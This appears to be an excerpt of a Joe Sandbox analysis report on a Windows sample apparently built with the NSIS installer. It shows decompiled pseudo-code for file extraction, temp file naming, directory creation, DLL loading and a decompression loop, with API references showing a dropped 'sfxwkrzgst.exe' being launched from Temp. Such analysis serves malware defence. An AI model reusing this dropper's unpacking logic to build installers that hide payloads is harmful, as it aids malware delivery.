							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405FD2(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00405FF7(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E00405569(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2a8;
						goto L32;
					} else {
						E00406507(0x40b5c8, _t83);
						E00406507(_t83, _t81);
						E00406544(_t77, _t81, _t83, "C:\Users\hardz\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406507(_t83, 0x40b5c8);
						_t64 = E00405B67("C:\Users\hardz\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2a8 =  &( *0x42a2a8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E00405569();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E00405569(0xffffffea,  *(_t86 - 8));
				 *0x42a2d4 =  *0x42a2d4 + 1;
				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x42a2d4 =  *0x42a2d4 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E00406544(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E00406544(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405B67();
					goto L29;
				}
				goto L33;
			}


















                                  0x0040176f
                                  0x00401776
                                  0x00401782
                                  0x00401785
                                  0x0040178a
                                  0x0040178d
                                  0x00401794
                                  0x004017b0
                                  0x00401796
                                  0x00401797
                                  0x00401797
                                  0x004017b6
                                  0x004017bb
                                  0x004017bb
                                  0x004017bf
                                  0x004017c2
                                  0x004017c7
                                  0x004017c9
                                  0x004017cb
                                  0x004017d0
                                  0x004017d0
                                  0x004017db
                                  0x004017db
                                  0x004017ec
                                  0x004017ee
                                  0x004017ee
                                  0x004017ef
                                  0x004017ef
                                  0x004017f2
                                  0x004017f5
                                  0x004017f8
                                  0x004017f8
                                  0x004017ff
                                  0x0040180e
                                  0x00401813
                                  0x00401816
                                  0x00401819
                                  0x00000000
                                  0x00000000
                                  0x0040181b
                                  0x0040181e
                                  0x00401874
                                  0x00401879
                                  0x004015b6
                                  0x0040292e
                                  0x0040292e
                                  0x00402c2a
                                  0x00402c2d
                                  0x00402c2d
                                  0x00000000
                                  0x00401820
                                  0x00401826
                                  0x0040182d
                                  0x0040183a
                                  0x00401845
                                  0x0040185b
                                  0x0040185b
                                  0x0040185e
                                  0x00000000
                                  0x00401864
                                  0x00401864
                                  0x00401865
                                  0x00401882
                                  0x00402c33
                                  0x00402c33
                                  0x00402c33
                                  0x00401867
                                  0x00401867
                                  0x00401868
                                  0x00401493
                                  0x0040239d
                                  0x0040239d
                                  0x0040239d
                                  0x00401865
                                  0x0040185e
                                  0x00402c35
                                  0x00402c39
                                  0x00402c39
                                  0x00401892
                                  0x00401897
                                  0x004018a5
                                  0x004018aa
                                  0x004018b0
                                  0x004018b4
                                  0x004018b6
                                  0x004018be
                                  0x004018ca
                                  0x004018b8
                                  0x004018b8
                                  0x004018bc
                                  0x00000000
                                  0x00000000
                                  0x004018bc
                                  0x004018d3
                                  0x004018d9
                                  0x004018db
                                  0x00000000
                                  0x004018e1
                                  0x004018e1
                                  0x004018e4
                                  0x004018fc
                                  0x004018e6
                                  0x004018e9
                                  0x004018f2
                                  0x004018f2
                                  0x00401901
                                  0x00401906
                                  0x00402398
                                  0x00000000
                                  0x00402398
                                  0x00000000

                                  APIs
                                  • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                  • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,00000000,00000000,C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,00436000,?,?,00000031), ref: 004017D5
                                    • Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514
                                    • Part of subcall function 00405569: lstrlenW.KERNEL32(004226E8,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                    • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,004226E8,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                    • Part of subcall function 00405569: lstrcatW.KERNEL32(004226E8,004033ED), ref: 004055C4
                                    • Part of subcall function 00405569: SetWindowTextW.USER32(004226E8,004226E8), ref: 004055D6
                                    • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                    • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                    • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                  • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj
                                  • API String ID: 1941528284-3945006646
                                  • Opcode ID: b7a5c6d7991662512772549b684664b1194690f22d2238f758046a2bb3bdcfd9
                                  • Instruction ID: a51aac5e68297d7f44276dbadf5c543e50a4c9306f3e74aef663979029aae524
                                  • Opcode Fuzzy Hash: b7a5c6d7991662512772549b684664b1194690f22d2238f758046a2bb3bdcfd9
                                  • Instruction Fuzzy Hash: AA41A071900105BACF11BBA5DD85DAE3AB9EF45328F20423FF412B10E1D63C8A519A6E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406864 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 582 406864-406884 GetSystemDirectoryW 583 406886 582->583 584 406888-40688a 582->584 583->584 585 40689b-40689d 584->585 586 40688c-406895 584->586 588 40689e-4068d1 wsprintfW LoadLibraryExW 585->588 586->585 587 406897-406899 586->587 587->588
                                  C-Code - Quality: 100%
                                  			E00406864(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                  0x0040687b
                                  0x00406884
                                  0x00406886
                                  0x00406886
                                  0x0040688a
                                  0x0040689d
                                  0x00406897
                                  0x00406897
                                  0x00406897
                                  0x004068b6
                                  0x004068ca
                                  0x004068d1

                                  APIs
                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
                                  • wsprintfW.USER32 ref: 004068B6
                                  • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068CA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                  • String ID: %s%S.dll$UXTHEME$\
                                  • API String ID: 2200240437-1946221925
                                  • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                  • Instruction ID: a3f2ba33ef282063e8bef789480649f163c4345fe71bbebd74fcccbb96bf8ece
                                  • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                  • Instruction Fuzzy Hash: 8DF0F671511119ABCB14BF64ED0DF9B376CAB00305F51447AAA46F10D0EB7CAA69CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405A38 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 589 405a38-405a83 CreateDirectoryW 590 405a85-405a87 589->590 591 405a89-405a96 GetLastError 589->591 592 405ab0-405ab2 590->592 591->592 593 405a98-405aac SetFileSecurityW 591->593 593->590 594 405aae GetLastError 593->594 594->592
                                  C-Code - Quality: 100%
                                  			E00405A38(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                  0x00405a43
                                  0x00405a47
                                  0x00405a4a
                                  0x00405a50
                                  0x00405a54
                                  0x00405a58
                                  0x00405a60
                                  0x00405a67
                                  0x00405a6d
                                  0x00405a74
                                  0x00405a7b
                                  0x00405a83
                                  0x00405a85
                                  0x00000000
                                  0x00405a85
                                  0x00405a8f
                                  0x00405a96
                                  0x00405aac
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405aae
                                  0x00405ab2

                                  APIs
                                  • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
                                  • GetLastError.KERNEL32 ref: 00405A8F
                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AA4
                                  • GetLastError.KERNEL32 ref: 00405AAE
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A5E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 3449924974-3916508600
                                  • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                  • Instruction ID: 227e2837d2f0abbefd05ded2a29fab346f6aadb36d837cb996d7b4b6dfe3b4b1
                                  • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                  • Instruction Fuzzy Hash: A7010C71D00219EEDF009B90D948BEFBBB8EB04314F00413AD945B6181D77896488FE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406026 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 595 406026-406032 596 406033-406067 GetTickCount GetTempFileNameW 595->596 597 406076-406078 596->597 598 406069-40606b 596->598 599 406070-406073 597->599 598->596 600 40606d 598->600 600->599
                                  C-Code - Quality: 100%
                                  			E00406026(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a57c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                  0x0040602c
                                  0x00406032
                                  0x00406033
                                  0x00406033
                                  0x00406038
                                  0x00406039
                                  0x0040603c
                                  0x00406041
                                  0x00406044
                                  0x0040604e
                                  0x0040605b
                                  0x0040605f
                                  0x00406067
                                  0x00000000
                                  0x00000000
                                  0x0040606b
                                  0x00000000
                                  0x0040606d
                                  0x0040606d
                                  0x0040606d
                                  0x00406070
                                  0x00406073
                                  0x00406073
                                  0x00406076
                                  0x00000000

                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00406044
                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,004034F5,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 0040605F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: CountFileNameTempTick
                                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                  • API String ID: 1716503409-1968954121
                                  • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                  • Instruction ID: f6a7e3e28ef10c8b5a356f390c602f787c019cac788ca5903e6ee53affe9a5d3
                                  • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                  • Instruction Fuzzy Hash: 92F09076B40204BBEB00CF59ED05E9EB7BCEB95750F11803AEA05F7140E6B09D648768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 684 405ede-405ef9 call 406507 call 405e81 689 405efb-405efd 684->689 690 405eff-405f0c call 40678e 684->690 691 405f57-405f59 689->691 694 405f1c-405f20 690->694 695 405f0e-405f14 690->695 697 405f36-405f3f lstrlenW 694->697 695->689 696 405f16-405f1a 695->696 696->689 696->694 698 405f41-405f55 call 405dd6 GetFileAttributesW 697->698 699 405f22-405f29 call 40683d 697->699 698->691 704 405f30-405f31 call 405e22 699->704 705 405f2b-405f2e 699->705 704->697 705->689 705->704
                                  C-Code - Quality: 53%
                                  			E00405EDE(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406507(0x425f10, _a4);
				_t21 = E00405E81(0x425f10);
				if(_t21 != 0) {
					E0040678E(_t21);
					if(( *0x42a238 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f10 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f10);
							_push(0x425f10);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040683D();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405E22(0x425f10);
								continue;
							} else {
								goto L1;
							}
						}
						E00405DD6();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                                  0x00405eea
                                  0x00405ef5
                                  0x00405ef9
                                  0x00405f00
                                  0x00405f0c
                                  0x00405f1c
                                  0x00405f1e
                                  0x00405f36
                                  0x00405f37
                                  0x00405f3e
                                  0x00405f3f
                                  0x00000000
                                  0x00000000
                                  0x00405f22
                                  0x00405f29
                                  0x00405f31
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405f29
                                  0x00405f41
                                  0x00405f47
                                  0x00000000
                                  0x00405f55
                                  0x00405f0e
                                  0x00405f14
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405f14
                                  0x00405efb
                                  0x00000000

                                  APIs
                                    • Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514
                                    • Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,7620FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
                                    • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
                                    • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC
                                  • lstrlenW.KERNEL32(00425F10,00000000,00425F10,00425F10,7620FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F37
                                  • GetFileAttributesW.KERNELBASE(00425F10,00425F10,00425F10,00425F10,00425F10,00425F10,00000000,00425F10,00425F10,7620FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,7620FAA0,C:\Users\user\AppData\Local\Temp\), ref: 00405F47
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405EDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 3248276644-3916508600
                                  • Opcode ID: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
                                  • Instruction ID: 801aa802fb238c59ad0d4c26bfab73d63669863fdcce98965586ad3d6a32a901
                                  • Opcode Fuzzy Hash: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
                                  • Instruction Fuzzy Hash: CCF0D135105D6226D622333A9C09AAF1508CF82364B5A053FBCD1B22D1DF3C8A53DDBE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407033 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 711 407033-407039 712 40703b-40703d 711->712 713 40703e-40705c 711->713 712->713 714 40726a-40727f 713->714 715 40732f-40733c 713->715 717 407281-407297 714->717 718 407299-4072af 714->718 716 407366-40736a 715->716 720 4073ca-4073dd 716->720 721 40736c-40738d 716->721 719 4072b2-4072b9 717->719 718->719 722 4072e0 719->722 723 4072bb-4072bf 719->723 726 4072e6-4072ec 720->726 724 4073a6-4073b9 721->724 725 40738f-4073a4 721->725 722->726 727 4072c5-4072dd 723->727 728 40746e-407478 723->728 729 4073bc-4073c3 724->729 725->729 734 406a91 726->734 735 407499 726->735 727->722 731 407484-407497 728->731 732 407363 729->732 733 4073c5 729->733 737 40749c-4074a0 731->737 732->716 746 407348-407360 733->746 747 40747a 733->747 738 406a98-406a9c 734->738 739 406bd8-406bf9 734->739 740 406b3d-406b41 734->740 741 406bad-406bb1 734->741 735->737 738->731 748 406aa2-406aaf 738->748 739->714 744 406b47-406b60 740->744 745 4073ed-4073f7 740->745 742 406bb7-406bcb 741->742 743 4073fc-407406 741->743 750 406bce-406bd6 742->750 743->731 751 406b63-406b67 744->751 745->731 746->732 747->731 748->735 749 406ab5-406afb 748->749 752 406b23-406b25 749->752 753 406afd-406b01 749->753 750->739 750->741 751->740 754 406b69-406b6f 751->754 757 406b33-406b3b 752->757 758 406b27-406b31 752->758 755 406b03-406b06 GlobalFree 753->755 756 406b0c-406b1a GlobalAlloc 753->756 759 406b71-406b78 754->759 760 406b99-406bab 754->760 755->756 756->735 761 406b20 756->761 757->751 758->757 758->758 762 406b83-406b93 GlobalAlloc 759->762 763 406b7a-406b7d GlobalFree 759->763 760->750 761->752 762->735 762->760 763->762
                                  C-Code - Quality: 99%
                                  			E00407033() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
